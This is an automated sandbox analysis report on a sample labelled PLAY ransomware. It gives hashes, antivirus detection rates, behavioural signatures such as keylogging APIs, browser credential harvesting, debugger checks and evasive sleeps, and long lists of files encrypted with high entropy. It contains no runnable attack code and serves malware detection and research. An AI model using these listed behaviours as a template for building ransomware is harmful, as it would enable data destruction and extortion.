Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PLAY.mal_.exe

Overview

General Information

Sample Name:PLAY.mal_.exe
Analysis ID:695797
MD5:223eff1610b432a1f1aa06c60bd7b9a6
SHA1:14177730443c65aefeeda3162b324fdedf9cf9e0
SHA256:006ae41910887f0811a3ba2868ef9576bbd265216554850112319af878f06e55
Tags:exePLAYransomware
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Writes many files with high entropy
Tries to harvest and steal browser information (history, passwords, etc)
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Keylogger Generic
Checks for available system drives (often done to infect USB drives)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to query network adapater information
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • PLAY.mal_.exe (PID: 6884 cmdline: "C:\Users\user\Desktop\PLAY.mal_.exe" MD5: 223EFF1610B432A1F1AA06C60BD7B9A6)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    Process Memory Space: PLAY.mal_.exe PID: 6884JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.3.PLAY.mal_.exe.3100000.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: PLAY.mal_.exeAvira: detected
        Multi AV Scanner detection for submitted file
        Source: PLAY.mal_.exeReversingLabs: Detection: 80%
        Source: PLAY.mal_.exeVirustotal: Detection: 71%Perma Link
        Source: PLAY.mal_.exeMetadefender: Detection: 45%Perma Link
        Source: PLAY.mal_.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: A:\ReadMe.txtJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: B:\ReadMe.txtJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ReadMe.txtJump to behavior
        Source: PLAY.mal_.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: netutils.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.380967509.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wkernel32.pdb source: PLAY.mal_.exe, 00000000.00000003.380378382.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: bcrypt.pdb source: PLAY.mal_.exe, 00000000.00000003.380946454.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ucrtbase.pdb source: PLAY.mal_.exe, 00000000.00000003.381007395.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: msvcrt.pdb source: PLAY.mal_.exe, 00000000.00000003.392615104.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wrpcrt4.pdb source: PLAY.mal_.exe, 00000000.00000003.381337074.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PLAY.mal_.exe, 00000000.00000003.380084663.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shcore.pdb source: PLAY.mal_.exe, 00000000.00000003.393091382.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wwin32u.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.402134952.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: bcryptprimitives.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381571826.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wgdi32.pdb source: PLAY.mal_.exe, 00000000.00000003.398338084.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: advapi32.pdb source: PLAY.mal_.exe, 00000000.00000003.397854199.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: fltLib.pdb source: PLAY.mal_.exe, 00000000.00000003.402653498.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wsspicli.pdb source: PLAY.mal_.exe, 00000000.00000003.381518459.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: cfgmgr32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.392986515.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shell32.pdb source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wrpcrt4.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381337074.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: msvcp_win.pdb source: PLAY.mal_.exe, 00000000.00000003.399573219.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wgdi32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.398338084.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wimm32.pdb source: PLAY.mal_.exe, 00000000.00000003.402719687.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wkernelbase.pdb source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shlwapi.pdb source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: mpr.pdb source: PLAY.mal_.exe, 00000000.00000003.402907884.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shlwapi.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wwin32u.pdb source: PLAY.mal_.exe, 00000000.00000003.402134952.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wsspicli.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.381518459.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: combase.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.393364039.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ucrtbase.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381007395.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: srvcli.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381294989.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wkernelbase.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: cryptbase.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381549375.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wuser32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.400002647.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shell32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: srvcli.pdb source: PLAY.mal_.exe, 00000000.00000003.381294989.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wimm32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402719687.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: fltLib.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.402653498.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: profapi.pdb source: PLAY.mal_.exe, 00000000.00000003.402283247.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wgdi32full.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.398793778.000000000317B000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ws2_32.pdb source: PLAY.mal_.exe, 00000000.00000003.382187348.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: iphlpapi.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381918022.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wgdi32full.pdb source: PLAY.mal_.exe, 00000000.00000003.398793778.000000000317B000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shcore.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.393091382.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: mpr.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402907884.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: sechost.pdb source: PLAY.mal_.exe, 00000000.00000003.381665426.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: iphlpapi.pdb source: PLAY.mal_.exe, 00000000.00000003.381918022.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.380084663.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: powrprof.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402395094.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: powrprof.pdb source: PLAY.mal_.exe, 00000000.00000003.402395094.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Windows.Storage.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.394554162.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: apphelp.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.380856909.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Kernel.Appcore.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402226498.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wkernel32.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.380378382.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: sechost.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381665426.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: PLAY.mal_.exe, 00000000.00000003.402226498.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: bcrypt.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.380946454.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: msvcp_win.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.399573219.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: advapi32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.397854199.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: cryptbase.pdb source: PLAY.mal_.exe, 00000000.00000003.381549375.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: bcryptprimitives.pdb source: PLAY.mal_.exe, 00000000.00000003.381571826.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: cfgmgr32.pdb source: PLAY.mal_.exe, 00000000.00000003.392986515.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Windows.Storage.pdb source: PLAY.mal_.exe, 00000000.00000003.394554162.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: combase.pdb source: PLAY.mal_.exe, 00000000.00000003.393364039.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
        Source: Binary string: profapi.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402283247.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: apphelp.pdb source: PLAY.mal_.exe, 00000000.00000003.380856909.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wuser32.pdb source: PLAY.mal_.exe, 00000000.00000003.400002647.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ws2_32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.382187348.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: netutils.pdb source: PLAY.mal_.exe, 00000000.00000003.380967509.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: e:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: [:Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEB625 FindFirstFileW,0_2_00AEB625
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AFC6C9 FindFirstFileExW,0_2_00AFC6C9
        Source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DirectInput8Create
        Source: PLAY.mal_.exe, 00000000.00000003.400002647.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputData
        Source: Yara matchFile source: 0.3.PLAY.mal_.exe.3100000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PLAY.mal_.exe PID: 6884, type: MEMORYSTR

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Writes many files with high entropy
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99370881577Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\Default\NTUSER.DAT entropy: 7.99938002977Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies entropy: 7.99055398413Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf entropy: 7.99747182705Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\Default\NTUSER.DAT.LOG1 entropy: 7.9969397682Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms entropy: 7.99960447813Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms entropy: 7.99967785702Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Recovery\WindowsRE\boot.sdi entropy: 7.99994281938Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Recovery\WindowsRE\Winre.wim entropy: 7.99978673587Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.9987204886Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat entropy: 7.99927592854Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js entropy: 7.99755154683Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.99692318117Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs entropy: 7.99994189562Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx entropy: 7.999942459Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99730845969Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs entropy: 7.99993639407Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma entropy: 7.99983376886Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database entropy: 7.99410406039Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62FC0DB0-1450.pma entropy: 7.99996109326Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab entropy: 7.99819227613Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab entropy: 7.99978805821Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\cab1.cab entropy: 7.99988789096Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\cab1.cab entropy: 7.99996778285Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab entropy: 7.99840138716Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab entropy: 7.99854582847Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab entropy: 7.99982593479Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\17f7cd50011af964_0 entropy: 7.99724336878Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab entropy: 7.99981866052Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab entropy: 7.99978332161Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab entropy: 7.99996026328Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab entropy: 7.99988212784Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\1ba843d01a7fd21b_0 entropy: 7.99766796554Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\2fc35d15f2eabeff_0 entropy: 7.99740770967Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab entropy: 7.99996505694Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl entropy: 7.99332668999Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.004.etl entropy: 7.99231889317Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.002.etl entropy: 7.99436517777Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\4d1a34821fab0830_0 entropy: 7.99882313552Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.009.etl entropy: 7.99064060505Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\USOShared\Logs\UpdateUx_Temp.1.etl entropy: 7.99535932735Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5e3d1997942e96db_0 entropy: 7.99887352838Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5d86ce9f97b83b7a_0 entropy: 7.99783382452Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\6634d30d3dcbf0b9_0 entropy: 7.99918174312Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\92ed7279d3e98be7_0 entropy: 7.99803431143Jump to dropped file
